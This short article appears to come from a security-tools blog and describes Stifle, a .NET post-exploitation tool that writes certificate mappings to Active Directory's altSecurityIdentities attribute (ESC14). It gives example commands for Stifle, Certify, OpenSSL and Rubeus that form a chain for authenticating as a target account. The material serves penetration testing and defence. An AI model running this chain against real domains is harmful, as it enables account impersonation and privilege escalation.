Stifle is a specialized .NET utility designed for post-exploitation scenarios, enabling attackers or penetration testers to exploit explicit certificate mapping in Active Directory (AD).
This tool leverages the altSecurityIdentities
attribute of AD objects, allowing authentication as a target object using a pre-obtained certificate.
Explicit certificate mappings are a key aspect of Active Directory Certificate Services (ADCS), which facilitates secure communication and authentication through public key infrastructure (PKI).
Stifle simplifies the process of adding or clearing explicit certificate mappings on AD objects. Its primary features include:
altSecurityIdentities
attribute with a certificate and its password. For example: Stifle.exe add /object:target /certificate:MIIMrQI... /password:P@ssw0rd
altSecurityIdentities
attribute: Stifle.exe clear /object:target
Certify.exe
to request a machine account certificate from ADCS. The certificate must be mapped to the target object. Certify.exe request /ca:lab.lan\lab-dc01-ca /template:Machine /machine
.pfx
format using OpenSSL: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export | base64 -w 0
Rubeus.exe asktgt /user:target /certificate:MIIMrQI... /password:P@ssw0rd
Explicit certificate mapping in AD allows associating certificates with user or computer accounts for authentication purposes. While this capability enhances security, it also introduces risks when misused.
Attackers can exploit write access to the altSecurityIdentities
attribute to impersonate accounts, as demonstrated by techniques like ESC14.
Stifle addresses gaps in existing tooling by providing a streamlined .NET-based solution for exploiting this attack vector.
However, its misuse underscores the importance of securing ADCS configurations and monitoring access to sensitive attributes like altSecurityIdentities
.
How Does a Firewall Work Step by Step? What Is a Firewall and How Does…
ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…
Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…
SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…
PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…
HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…